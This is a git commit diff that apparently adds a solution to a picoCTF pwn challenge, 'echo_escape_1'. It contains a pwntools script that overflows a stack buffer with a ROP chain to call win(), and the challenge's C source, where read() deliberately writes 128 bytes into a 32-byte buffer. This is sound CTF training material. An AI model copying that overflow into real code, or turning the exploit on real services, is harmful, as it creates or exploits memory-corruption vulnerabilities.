pwn/echo_escape_1
This commit is contained in:
@@ -0,0 +1 @@
|
||||
picoCTF{dummy}
|
||||
Executable
+33
@@ -0,0 +1,33 @@
|
||||
#!/usr/bin/env nix-shell
|
||||
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
|
||||
|
||||
from pwn import *
|
||||
|
||||
exe = ELF("./vuln")
|
||||
|
||||
context.binary = exe
|
||||
|
||||
ADDR, PORT, *_ = "mysterious-sea.picoctf.net 50726".split()
|
||||
|
||||
def conn():
|
||||
if args.REMOTE:
|
||||
r = remote(ADDR, PORT)
|
||||
else:
|
||||
r = process([exe.path])
|
||||
|
||||
return r
|
||||
|
||||
def main():
|
||||
r = conn()
|
||||
r.recvuntil(b'Please enter your name: ').decode()
|
||||
|
||||
offset = 0x28
|
||||
rop = ROP(exe)
|
||||
rop.raw(rop.generatePadding(0, offset))
|
||||
rop.win()
|
||||
r.sendline(rop.chain())
|
||||
print(r.recvline_contains(b'picoCTF').decode())
|
||||
r.close()
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Executable
BIN
Binary file not shown.
@@ -0,0 +1,34 @@
|
||||
|
||||
#include <stdio.h>
|
||||
#include <unistd.h>
|
||||
#include <string.h>
|
||||
|
||||
void win() {
|
||||
FILE *fp = fopen("flag.txt", "rb");
|
||||
if (!fp) {
|
||||
perror("[!] Failed to open flag.txt");
|
||||
return;
|
||||
}
|
||||
|
||||
char buffer[128];
|
||||
size_t n = fread(buffer, 1, sizeof(buffer), fp);
|
||||
fwrite(buffer, 1, n, stdout);
|
||||
fflush(stdout);
|
||||
printf("\n");
|
||||
fclose(fp);
|
||||
}
|
||||
|
||||
int main() {
|
||||
char buf[32];
|
||||
|
||||
printf("Welcome to the secure echo service!\n");
|
||||
printf("Please enter your name: ");
|
||||
fflush(stdout);
|
||||
|
||||
read(0, buf, 128);
|
||||
|
||||
printf("Hello, %s\n", buf);
|
||||
printf("Thank you for using our service.\n");
|
||||
|
||||
return 0;
|
||||
}
|
||||
Reference in New Issue
Block a user